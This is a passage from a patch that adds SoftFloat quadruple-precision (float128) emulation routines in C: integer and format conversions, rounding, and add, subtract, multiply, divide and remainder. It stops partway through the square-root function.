extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + aSign = extractFloat128Sign( a ); + if ( ( aExp == 0x7FFF ) && ( aSig0 | aSig1 ) ) aSign = 0; + if ( aExp ) aSig0 |= LIT64( 0x0001000000000000 ); + aSig0 |= ( aSig1 != 0 ); + shiftCount = 0x4028 - aExp; + if ( 0 < shiftCount ) shift64RightJamming( aSig0, shiftCount, &aSig0 ); + return roundAndPackInt32( aSign, aSig0 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the quadruple-precision floating-point +| value `a' to the 32-bit two's complement integer format. The conversion +| is performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic, except that the conversion is always rounded toward zero. If +| `a' is a NaN, the largest positive integer is returned. Otherwise, if the +| conversion overflows, the largest integer with the same sign as `a' is +| returned. +*----------------------------------------------------------------------------*/ + +int32 float128_to_int32_round_to_zero( float128 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp, shiftCount; + uint64_t aSig0, aSig1, savedASig; + int32_t z; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + aSign = extractFloat128Sign( a ); + aSig0 |= ( aSig1 != 0 ); + if ( 0x401E < aExp ) { + if ( ( aExp == 0x7FFF ) && aSig0 ) aSign = 0; + goto invalid; + } + else if ( aExp < 0x3FFF ) { + if ( aExp || aSig0 ) STATUS(float_exception_flags) |= float_flag_inexact; + return 0; + } + aSig0 |= LIT64( 0x0001000000000000 ); + shiftCount = 0x402F - aExp; + savedASig = aSig0; + aSig0 >>= shiftCount; + z = (int32_t)aSig0; + if ( aSign ) z = - z; + if ( ( z < 0 ) ^ aSign ) { + invalid: + float_raise( float_flag_invalid STATUS_VAR); + return aSign ? (int32_t) 0x80000000 : 0x7FFFFFFF; + } + if ( ( aSig0<<shiftCount ) != savedASig ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the quadruple-precision floating-point +| value `a' to the 64-bit two's complement integer format. The conversion +| is performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic---which means in particular that the conversion is rounded +| according to the current rounding mode. If `a' is a NaN, the largest +| positive integer is returned. Otherwise, if the conversion overflows, the +| largest integer with the same sign as `a' is returned. +*----------------------------------------------------------------------------*/ + +int64 float128_to_int64( float128 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp, shiftCount; + uint64_t aSig0, aSig1; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + aSign = extractFloat128Sign( a ); + if ( aExp ) aSig0 |= LIT64( 0x0001000000000000 ); + shiftCount = 0x402F - aExp; + if ( shiftCount <= 0 ) { + if ( 0x403E < aExp ) { + float_raise( float_flag_invalid STATUS_VAR); + if ( ! aSign + || ( ( aExp == 0x7FFF ) + && ( aSig1 || ( aSig0 != LIT64( 0x0001000000000000 ) ) ) + ) + ) { + return LIT64( 0x7FFFFFFFFFFFFFFF ); + } + return (int64_t) LIT64( 0x8000000000000000 ); + } + shortShift128Left( aSig0, aSig1, - shiftCount, &aSig0, &aSig1 ); + } + else { + shift64ExtraRightJamming( aSig0, aSig1, shiftCount, &aSig0, &aSig1 ); + } + return roundAndPackInt64( aSign, aSig0, aSig1 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the quadruple-precision floating-point +| value `a' to the 64-bit two's complement integer format. The conversion +| is performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic, except that the conversion is always rounded toward zero. +| If `a' is a NaN, the largest positive integer is returned. Otherwise, if +| the conversion overflows, the largest integer with the same sign as `a' is +| returned. +*----------------------------------------------------------------------------*/ + +int64 float128_to_int64_round_to_zero( float128 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp, shiftCount; + uint64_t aSig0, aSig1; + int64 z; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + aSign = extractFloat128Sign( a ); + if ( aExp ) aSig0 |= LIT64( 0x0001000000000000 ); + shiftCount = aExp - 0x402F; + if ( 0 < shiftCount ) { + if ( 0x403E <= aExp ) { + aSig0 &= LIT64( 0x0000FFFFFFFFFFFF ); + if ( ( a.high == LIT64( 0xC03E000000000000 ) ) + && ( aSig1 < LIT64( 0x0002000000000000 ) ) ) { + if ( aSig1 ) STATUS(float_exception_flags) |= float_flag_inexact; + } + else { + float_raise( float_flag_invalid STATUS_VAR); + if ( ! aSign || ( ( aExp == 0x7FFF ) && ( aSig0 | aSig1 ) ) ) { + return LIT64( 0x7FFFFFFFFFFFFFFF ); + } + } + return (int64_t) LIT64( 0x8000000000000000 ); + } + z = ( aSig0<<shiftCount ) | ( aSig1>>( ( - shiftCount ) & 63 ) ); + if ( (uint64_t) ( aSig1<<shiftCount ) ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + } + else { + if ( aExp < 0x3FFF ) { + if ( aExp | aSig0 | aSig1 ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + return 0; + } + z = aSig0>>( - shiftCount ); + if ( aSig1 + || ( shiftCount && (uint64_t) ( aSig0<<( shiftCount & 63 ) ) ) ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + } + if ( aSign ) z = - z; + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the quadruple-precision floating-point +| value `a' to the single-precision floating-point format. The conversion +| is performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. +*----------------------------------------------------------------------------*/ + +float32 float128_to_float32( float128 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp; + uint64_t aSig0, aSig1; + uint32_t zSig; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + aSign = extractFloat128Sign( a ); + if ( aExp == 0x7FFF ) { + if ( aSig0 | aSig1 ) { + return commonNaNToFloat32( float128ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + } + return packFloat32( aSign, 0xFF, 0 ); + } + aSig0 |= ( aSig1 != 0 ); + shift64RightJamming( aSig0, 18, &aSig0 ); + zSig = (uint32_t)aSig0; + if ( aExp || zSig ) { + zSig |= 0x40000000; + aExp -= 0x3F81; + } + return roundAndPackFloat32( aSign, aExp, zSig STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the quadruple-precision floating-point +| value `a' to the double-precision floating-point format. The conversion +| is performed according to the IEC/IEEE Standard for Binary Floating-Point +| Arithmetic. +*----------------------------------------------------------------------------*/ + +float64 float128_to_float64( float128 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp; + uint64_t aSig0, aSig1; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + aSign = extractFloat128Sign( a ); + if ( aExp == 0x7FFF ) { + if ( aSig0 | aSig1 ) { + return commonNaNToFloat64( float128ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + } + return packFloat64( aSign, 0x7FF, 0 ); + } + shortShift128Left( aSig0, aSig1, 14, &aSig0, &aSig1 ); + aSig0 |= ( aSig1 != 0 ); + if ( aExp || aSig0 ) { + aSig0 |= LIT64( 0x4000000000000000 ); + aExp -= 0x3C01; + } + return roundAndPackFloat64( aSign, aExp, aSig0 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the quadruple-precision floating-point +| value `a' to the extended double-precision floating-point format. The +| conversion is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +floatx80 float128_to_floatx80( float128 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp; + uint64_t aSig0, aSig1; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + aSign = extractFloat128Sign( a ); + if ( aExp == 0x7FFF ) { + if ( aSig0 | aSig1 ) { + return commonNaNToFloatx80( float128ToCommonNaN( a STATUS_VAR ) STATUS_VAR ); + } + return packFloatx80( aSign, 0x7FFF, LIT64( 0x8000000000000000 ) ); + } + if ( aExp == 0 ) { + if ( ( aSig0 | aSig1 ) == 0 ) return packFloatx80( aSign, 0, 0 ); + normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 ); + } + else { + aSig0 |= LIT64( 0x0001000000000000 ); + } + shortShift128Left( aSig0, aSig1, 15, &aSig0, &aSig1 ); + return roundAndPackFloatx80( 80, aSign, aExp, aSig0, aSig1 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Rounds the quadruple-precision floating-point value `a' to an integer, and +| returns the result as a quadruple-precision floating-point value. The +| operation is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float128 float128_round_to_int( float128 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp; + uint64_t lastBitMask, roundBitsMask; + float128 z; + + aExp = extractFloat128Exp( a ); + if ( 0x402F <= aExp ) { + if ( 0x406F <= aExp ) { + if ( ( aExp == 0x7FFF ) + && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) ) + ) { + return propagateFloat128NaN( a, a STATUS_VAR ); + } + return a; + } + lastBitMask = 1; + lastBitMask = ( lastBitMask<<( 0x406E - aExp ) )<<1; + roundBitsMask = lastBitMask - 1; + z = a; + switch (STATUS(float_rounding_mode)) { + case float_round_nearest_even: + if ( lastBitMask ) { + add128( z.high, z.low, 0, lastBitMask>>1, &z.high, &z.low ); + if ( ( z.low & roundBitsMask ) == 0 ) z.low &= ~ lastBitMask; + } + else { + if ( (int64_t) z.low < 0 ) { + ++z.high; + if ( (uint64_t) ( z.low<<1 ) == 0 ) z.high &= ~1; + } + } + break; + case float_round_ties_away: + if (lastBitMask) { + add128(z.high, z.low, 0, lastBitMask >> 1, &z.high, &z.low); + } else { + if ((int64_t) z.low < 0) { + ++z.high; + } + } + break; + case float_round_to_zero: + break; + case float_round_up: + if (!extractFloat128Sign(z)) { + add128(z.high, z.low, 0, roundBitsMask, &z.high, &z.low); + } + break; + case float_round_down: + if (extractFloat128Sign(z)) { + add128(z.high, z.low, 0, roundBitsMask, &z.high, &z.low); + } + break; + default: + float_raise(float_flag_invalid STATUS_VAR); + break; + } + z.low &= ~ roundBitsMask; + } + else { + if ( aExp < 0x3FFF ) { + if ( ( ( (uint64_t) ( a.high<<1 ) ) | a.low ) == 0 ) return a; + STATUS(float_exception_flags) |= float_flag_inexact; + aSign = extractFloat128Sign( a ); + switch ( STATUS(float_rounding_mode) ) { + case float_round_nearest_even: + if ( ( aExp == 0x3FFE ) + && ( extractFloat128Frac0( a ) + | extractFloat128Frac1( a ) ) + ) { + return packFloat128( aSign, 0x3FFF, 0, 0 ); + } + break; + case float_round_ties_away: + if (aExp == 0x3FFE) { + return packFloat128(aSign, 0x3FFF, 0, 0); + } + break; + case float_round_down: + return + aSign ? packFloat128( 1, 0x3FFF, 0, 0 ) + : packFloat128( 0, 0, 0, 0 ); + case float_round_up: + return + aSign ? packFloat128( 1, 0, 0, 0 ) + : packFloat128( 0, 0x3FFF, 0, 0 ); + } + return packFloat128( aSign, 0, 0, 0 ); + } + lastBitMask = 1; + lastBitMask <<= 0x402F - aExp; + roundBitsMask = lastBitMask - 1; + z.low = 0; + z.high = a.high; + switch (STATUS(float_rounding_mode)) { + case float_round_nearest_even: + z.high += lastBitMask>>1; + if ( ( ( z.high & roundBitsMask ) | a.low ) == 0 ) { + z.high &= ~ lastBitMask; + } + break; + case float_round_ties_away: + z.high += lastBitMask>>1; + break; + case float_round_to_zero: + break; + case float_round_up: + if (!extractFloat128Sign(z)) { + z.high |= ( a.low != 0 ); + z.high += roundBitsMask; + } + break; + case float_round_down: + if (extractFloat128Sign(z)) { + z.high |= (a.low != 0); + z.high += roundBitsMask; + } + break; + default: + float_raise(float_flag_invalid STATUS_VAR); + break; + } + z.high &= ~ roundBitsMask; + } + if ( ( z.low != a.low ) || ( z.high != a.high ) ) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + return z; + +} + +/*---------------------------------------------------------------------------- +| Returns the result of adding the absolute values of the quadruple-precision +| floating-point values `a' and `b'. If `zSign' is 1, the sum is negated +| before being returned. `zSign' is ignored if the result is a NaN. +| The addition is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +static float128 addFloat128Sigs( float128 a, float128 b, flag zSign STATUS_PARAM) +{ + int32 aExp, bExp, zExp; + uint64_t aSig0, aSig1, bSig0, bSig1, zSig0, zSig1, zSig2; + int32 expDiff; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + bSig1 = extractFloat128Frac1( b ); + bSig0 = extractFloat128Frac0( b ); + bExp = extractFloat128Exp( b ); + expDiff = aExp - bExp; + if ( 0 < expDiff ) { + if ( aExp == 0x7FFF ) { + if ( aSig0 | aSig1 ) return propagateFloat128NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) { + --expDiff; + } + else { + bSig0 |= LIT64( 0x0001000000000000 ); + } + shift128ExtraRightJamming( + bSig0, bSig1, 0, expDiff, &bSig0, &bSig1, &zSig2 ); + zExp = aExp; + } + else if ( expDiff < 0 ) { + if ( bExp == 0x7FFF ) { + if ( bSig0 | bSig1 ) return propagateFloat128NaN( a, b STATUS_VAR ); + return packFloat128( zSign, 0x7FFF, 0, 0 ); + } + if ( aExp == 0 ) { + ++expDiff; + } + else { + aSig0 |= LIT64( 0x0001000000000000 ); + } + shift128ExtraRightJamming( + aSig0, aSig1, 0, - expDiff, &aSig0, &aSig1, &zSig2 ); + zExp = bExp; + } + else { + if ( aExp == 0x7FFF ) { + if ( aSig0 | aSig1 | bSig0 | bSig1 ) { + return propagateFloat128NaN( a, b STATUS_VAR ); + } + return a; + } + add128( aSig0, aSig1, bSig0, bSig1, &zSig0, &zSig1 ); + if ( aExp == 0 ) { + if (STATUS(flush_to_zero)) { + if (zSig0 | zSig1) { + float_raise(float_flag_output_denormal STATUS_VAR); + } + return packFloat128(zSign, 0, 0, 0); + } + return packFloat128( zSign, 0, zSig0, zSig1 ); + } + zSig2 = 0; + zSig0 |= LIT64( 0x0002000000000000 ); + zExp = aExp; + goto shiftRight1; + } + aSig0 |= LIT64( 0x0001000000000000 ); + add128( aSig0, aSig1, bSig0, bSig1, &zSig0, &zSig1 ); + --zExp; + if ( zSig0 < LIT64( 0x0002000000000000 ) ) goto roundAndPack; + ++zExp; + shiftRight1: + shift128ExtraRightJamming( + zSig0, zSig1, zSig2, 1, &zSig0, &zSig1, &zSig2 ); + roundAndPack: + return roundAndPackFloat128( zSign, zExp, zSig0, zSig1, zSig2 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of subtracting the absolute values of the quadruple- +| precision floating-point values `a' and `b'. If `zSign' is 1, the +| difference is negated before being returned. `zSign' is ignored if the +| result is a NaN. The subtraction is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +static float128 subFloat128Sigs( float128 a, float128 b, flag zSign STATUS_PARAM) +{ + int32 aExp, bExp, zExp; + uint64_t aSig0, aSig1, bSig0, bSig1, zSig0, zSig1; + int32 expDiff; + float128 z; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + bSig1 = extractFloat128Frac1( b ); + bSig0 = extractFloat128Frac0( b ); + bExp = extractFloat128Exp( b ); + expDiff = aExp - bExp; + shortShift128Left( aSig0, aSig1, 14, &aSig0, &aSig1 ); + shortShift128Left( bSig0, bSig1, 14, &bSig0, &bSig1 ); + if ( 0 < expDiff ) goto aExpBigger; + if ( expDiff < 0 ) goto bExpBigger; + if ( aExp == 0x7FFF ) { + if ( aSig0 | aSig1 | bSig0 | bSig1 ) { + return propagateFloat128NaN( a, b STATUS_VAR ); + } + float_raise( float_flag_invalid STATUS_VAR); + z.low = float128_default_nan_low; + z.high = float128_default_nan_high; + return z; + } + if ( aExp == 0 ) { + aExp = 1; + bExp = 1; + } + if ( bSig0 < aSig0 ) goto aBigger; + if ( aSig0 < bSig0 ) goto bBigger; + if ( bSig1 < aSig1 ) goto aBigger; + if ( aSig1 < bSig1 ) goto bBigger; + return packFloat128( STATUS(float_rounding_mode) == float_round_down, 0, 0, 0 ); + bExpBigger: + if ( bExp == 0x7FFF ) { + if ( bSig0 | bSig1 ) return propagateFloat128NaN( a, b STATUS_VAR ); + return packFloat128( zSign ^ 1, 0x7FFF, 0, 0 ); + } + if ( aExp == 0 ) { + ++expDiff; + } + else { + aSig0 |= LIT64( 0x4000000000000000 ); + } + shift128RightJamming( aSig0, aSig1, - expDiff, &aSig0, &aSig1 ); + bSig0 |= LIT64( 0x4000000000000000 ); + bBigger: + sub128( bSig0, bSig1, aSig0, aSig1, &zSig0, &zSig1 ); + zExp = bExp; + zSign ^= 1; + goto normalizeRoundAndPack; + aExpBigger: + if ( aExp == 0x7FFF ) { + if ( aSig0 | aSig1 ) return propagateFloat128NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) { + --expDiff; + } + else { + bSig0 |= LIT64( 0x4000000000000000 ); + } + shift128RightJamming( bSig0, bSig1, expDiff, &bSig0, &bSig1 ); + aSig0 |= LIT64( 0x4000000000000000 ); + aBigger: + sub128( aSig0, aSig1, bSig0, bSig1, &zSig0, &zSig1 ); + zExp = aExp; + normalizeRoundAndPack: + --zExp; + return normalizeRoundAndPackFloat128( zSign, zExp - 14, zSig0, zSig1 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of adding the quadruple-precision floating-point values +| `a' and `b'. The operation is performed according to the IEC/IEEE Standard +| for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float128 float128_add( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, bSign; + + aSign = extractFloat128Sign( a ); + bSign = extractFloat128Sign( b ); + if ( aSign == bSign ) { + return addFloat128Sigs( a, b, aSign STATUS_VAR ); + } + else { + return subFloat128Sigs( a, b, aSign STATUS_VAR ); + } + +} + +/*---------------------------------------------------------------------------- +| Returns the result of subtracting the quadruple-precision floating-point +| values `a' and `b'. The operation is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float128 float128_sub( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, bSign; + + aSign = extractFloat128Sign( a ); + bSign = extractFloat128Sign( b ); + if ( aSign == bSign ) { + return subFloat128Sigs( a, b, aSign STATUS_VAR ); + } + else { + return addFloat128Sigs( a, b, aSign STATUS_VAR ); + } + +} + +/*---------------------------------------------------------------------------- +| Returns the result of multiplying the quadruple-precision floating-point +| values `a' and `b'. The operation is performed according to the IEC/IEEE +| Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float128 float128_mul( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, bSign, zSign; + int32 aExp, bExp, zExp; + uint64_t aSig0, aSig1, bSig0, bSig1, zSig0, zSig1, zSig2, zSig3; + float128 z; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + aSign = extractFloat128Sign( a ); + bSig1 = extractFloat128Frac1( b ); + bSig0 = extractFloat128Frac0( b ); + bExp = extractFloat128Exp( b ); + bSign = extractFloat128Sign( b ); + zSign = aSign ^ bSign; + if ( aExp == 0x7FFF ) { + if ( ( aSig0 | aSig1 ) + || ( ( bExp == 0x7FFF ) && ( bSig0 | bSig1 ) ) ) { + return propagateFloat128NaN( a, b STATUS_VAR ); + } + if ( ( bExp | bSig0 | bSig1 ) == 0 ) goto invalid; + return packFloat128( zSign, 0x7FFF, 0, 0 ); + } + if ( bExp == 0x7FFF ) { + if ( bSig0 | bSig1 ) return propagateFloat128NaN( a, b STATUS_VAR ); + if ( ( aExp | aSig0 | aSig1 ) == 0 ) { + invalid: + float_raise( float_flag_invalid STATUS_VAR); + z.low = float128_default_nan_low; + z.high = float128_default_nan_high; + return z; + } + return packFloat128( zSign, 0x7FFF, 0, 0 ); + } + if ( aExp == 0 ) { + if ( ( aSig0 | aSig1 ) == 0 ) return packFloat128( zSign, 0, 0, 0 ); + normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 ); + } + if ( bExp == 0 ) { + if ( ( bSig0 | bSig1 ) == 0 ) return packFloat128( zSign, 0, 0, 0 ); + normalizeFloat128Subnormal( bSig0, bSig1, &bExp, &bSig0, &bSig1 ); + } + zExp = aExp + bExp - 0x4000; + aSig0 |= LIT64( 0x0001000000000000 ); + shortShift128Left( bSig0, bSig1, 16, &bSig0, &bSig1 ); + mul128To256( aSig0, aSig1, bSig0, bSig1, &zSig0, &zSig1, &zSig2, &zSig3 ); + add128( zSig0, zSig1, aSig0, aSig1, &zSig0, &zSig1 ); + zSig2 |= ( zSig3 != 0 ); + if ( LIT64( 0x0002000000000000 ) <= zSig0 ) { + shift128ExtraRightJamming( + zSig0, zSig1, zSig2, 1, &zSig0, &zSig1, &zSig2 ); + ++zExp; + } + return roundAndPackFloat128( zSign, zExp, zSig0, zSig1, zSig2 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the result of dividing the quadruple-precision floating-point value +| `a' by the corresponding value `b'. The operation is performed according to +| the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float128 float128_div( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, bSign, zSign; + int32 aExp, bExp, zExp; + uint64_t aSig0, aSig1, bSig0, bSig1, zSig0, zSig1, zSig2; + uint64_t rem0, rem1, rem2, rem3, term0, term1, term2, term3; + float128 z; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + aSign = extractFloat128Sign( a ); + bSig1 = extractFloat128Frac1( b ); + bSig0 = extractFloat128Frac0( b ); + bExp = extractFloat128Exp( b ); + bSign = extractFloat128Sign( b ); + zSign = aSign ^ bSign; + if ( aExp == 0x7FFF ) { + if ( aSig0 | aSig1 ) return propagateFloat128NaN( a, b STATUS_VAR ); + if ( bExp == 0x7FFF ) { + if ( bSig0 | bSig1 ) return propagateFloat128NaN( a, b STATUS_VAR ); + goto invalid; + } + return packFloat128( zSign, 0x7FFF, 0, 0 ); + } + if ( bExp == 0x7FFF ) { + if ( bSig0 | bSig1 ) return propagateFloat128NaN( a, b STATUS_VAR ); + return packFloat128( zSign, 0, 0, 0 ); + } + if ( bExp == 0 ) { + if ( ( bSig0 | bSig1 ) == 0 ) { + if ( ( aExp | aSig0 | aSig1 ) == 0 ) { + invalid: + float_raise( float_flag_invalid STATUS_VAR); + z.low = float128_default_nan_low; + z.high = float128_default_nan_high; + return z; + } + float_raise( float_flag_divbyzero STATUS_VAR); + return packFloat128( zSign, 0x7FFF, 0, 0 ); + } + normalizeFloat128Subnormal( bSig0, bSig1, &bExp, &bSig0, &bSig1 ); + } + if ( aExp == 0 ) { + if ( ( aSig0 | aSig1 ) == 0 ) return packFloat128( zSign, 0, 0, 0 ); + normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 ); + } + zExp = aExp - bExp + 0x3FFD; + shortShift128Left( + aSig0 | LIT64( 0x0001000000000000 ), aSig1, 15, &aSig0, &aSig1 ); + shortShift128Left( + bSig0 | LIT64( 0x0001000000000000 ), bSig1, 15, &bSig0, &bSig1 ); + if ( le128( bSig0, bSig1, aSig0, aSig1 ) ) { + shift128Right( aSig0, aSig1, 1, &aSig0, &aSig1 ); + ++zExp; + } + zSig0 = estimateDiv128To64( aSig0, aSig1, bSig0 ); + mul128By64To192( bSig0, bSig1, zSig0, &term0, &term1, &term2 ); + sub192( aSig0, aSig1, 0, term0, term1, term2, &rem0, &rem1, &rem2 ); + while ( (int64_t) rem0 < 0 ) { + --zSig0; + add192( rem0, rem1, rem2, 0, bSig0, bSig1, &rem0, &rem1, &rem2 ); + } + zSig1 = estimateDiv128To64( rem1, rem2, bSig0 ); + if ( ( zSig1 & 0x3FFF ) <= 4 ) { + mul128By64To192( bSig0, bSig1, zSig1, &term1, &term2, &term3 ); + sub192( rem1, rem2, 0, term1, term2, term3, &rem1, &rem2, &rem3 ); + while ( (int64_t) rem1 < 0 ) { + --zSig1; + add192( rem1, rem2, rem3, 0, bSig0, bSig1, &rem1, &rem2, &rem3 ); + } + zSig1 |= ( ( rem1 | rem2 | rem3 ) != 0 ); + } + shift128ExtraRightJamming( zSig0, zSig1, 0, 15, &zSig0, &zSig1, &zSig2 ); + return roundAndPackFloat128( zSign, zExp, zSig0, zSig1, zSig2 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the remainder of the quadruple-precision floating-point value `a' +| with respect to the corresponding value `b'. The operation is performed +| according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float128 float128_rem( float128 a, float128 b STATUS_PARAM ) +{ + flag aSign, zSign; + int32 aExp, bExp, expDiff; + uint64_t aSig0, aSig1, bSig0, bSig1, q, term0, term1, term2; + uint64_t allZero, alternateASig0, alternateASig1, sigMean1; + int64_t sigMean0; + float128 z; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + aSign = extractFloat128Sign( a ); + bSig1 = extractFloat128Frac1( b ); + bSig0 = extractFloat128Frac0( b ); + bExp = extractFloat128Exp( b ); + if ( aExp == 0x7FFF ) { + if ( ( aSig0 | aSig1 ) + || ( ( bExp == 0x7FFF ) && ( bSig0 | bSig1 ) ) ) { + return propagateFloat128NaN( a, b STATUS_VAR ); + } + goto invalid; + } + if ( bExp == 0x7FFF ) { + if ( bSig0 | bSig1 ) return propagateFloat128NaN( a, b STATUS_VAR ); + return a; + } + if ( bExp == 0 ) { + if ( ( bSig0 | bSig1 ) == 0 ) { + invalid: + float_raise( float_flag_invalid STATUS_VAR); + z.low = float128_default_nan_low; + z.high = float128_default_nan_high; + return z; + } + normalizeFloat128Subnormal( bSig0, bSig1, &bExp, &bSig0, &bSig1 ); + } + if ( aExp == 0 ) { + if ( ( aSig0 | aSig1 ) == 0 ) return a; + normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 ); + } + expDiff = aExp - bExp; + if ( expDiff < -1 ) return a; + shortShift128Left( + aSig0 | LIT64( 0x0001000000000000 ), + aSig1, + 15 - ( expDiff < 0 ), + &aSig0, + &aSig1 + ); + shortShift128Left( + bSig0 | LIT64( 0x0001000000000000 ), bSig1, 15, &bSig0, &bSig1 ); + q = le128( bSig0, bSig1, aSig0, aSig1 ); + if ( q ) sub128( aSig0, aSig1, bSig0, bSig1, &aSig0, &aSig1 ); + expDiff -= 64; + while ( 0 < expDiff ) { + q = estimateDiv128To64( aSig0, aSig1, bSig0 ); + q = ( 4 < q ) ? q - 4 : 0; + mul128By64To192( bSig0, bSig1, q, &term0, &term1, &term2 ); + shortShift192Left( term0, term1, term2, 61, &term1, &term2, &allZero ); + shortShift128Left( aSig0, aSig1, 61, &aSig0, &allZero ); + sub128( aSig0, 0, term1, term2, &aSig0, &aSig1 ); + expDiff -= 61; + } + if ( -64 < expDiff ) { + q = estimateDiv128To64( aSig0, aSig1, bSig0 ); + q = ( 4 < q ) ? q - 4 : 0; + q >>= - expDiff; + shift128Right( bSig0, bSig1, 12, &bSig0, &bSig1 ); + expDiff += 52; + if ( expDiff < 0 ) { + shift128Right( aSig0, aSig1, - expDiff, &aSig0, &aSig1 ); + } + else { + shortShift128Left( aSig0, aSig1, expDiff, &aSig0, &aSig1 ); + } + mul128By64To192( bSig0, bSig1, q, &term0, &term1, &term2 ); + sub128( aSig0, aSig1, term1, term2, &aSig0, &aSig1 ); + } + else { + shift128Right( aSig0, aSig1, 12, &aSig0, &aSig1 ); + shift128Right( bSig0, bSig1, 12, &bSig0, &bSig1 ); + } + do { + alternateASig0 = aSig0; + alternateASig1 = aSig1; + ++q; + sub128( aSig0, aSig1, bSig0, bSig1, &aSig0, &aSig1 ); + } while ( 0 <= (int64_t) aSig0 ); + add128( + aSig0, aSig1, alternateASig0, alternateASig1, (uint64_t *)&sigMean0, &sigMean1 ); + if ( ( sigMean0 < 0 ) + || ( ( ( sigMean0 | sigMean1 ) == 0 ) && ( q & 1 ) ) ) { + aSig0 = alternateASig0; + aSig1 = alternateASig1; + } + zSign = ( (int64_t) aSig0 < 0 ); + if ( zSign ) sub128( 0, 0, aSig0, aSig1, &aSig0, &aSig1 ); + return + normalizeRoundAndPackFloat128( aSign ^ zSign, bExp - 4, aSig0, aSig1 STATUS_VAR ); + +} + +/*---------------------------------------------------------------------------- +| Returns the square root of the quadruple-precision floating-point value `a'. +| The operation is performed according to the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +float128 float128_sqrt( float128 a STATUS_PARAM ) +{ + flag aSign; + int32 aExp, zExp; + uint64_t aSig0, aSig1, zSig0, zSig1, zSig2, doubleZSig0; + uint64_t rem0, rem1, rem2, rem3, term0, term1, term2, term3; + float128 z; + + aSig1 = extractFloat128Frac1( a ); + aSig0 = extractFloat128Frac0( a ); + aExp = extractFloat128Exp( a ); + aSign = extractFloat128Sign( a ); + if ( aExp == 0x7FFF ) { + if ( aSig0 | aSig1 ) return propagateFloat128NaN( a, a STATUS_VAR ); + if ( ! aSign ) return a; + goto invalid; + } + if ( aSign ) { + if ( ( aExp | 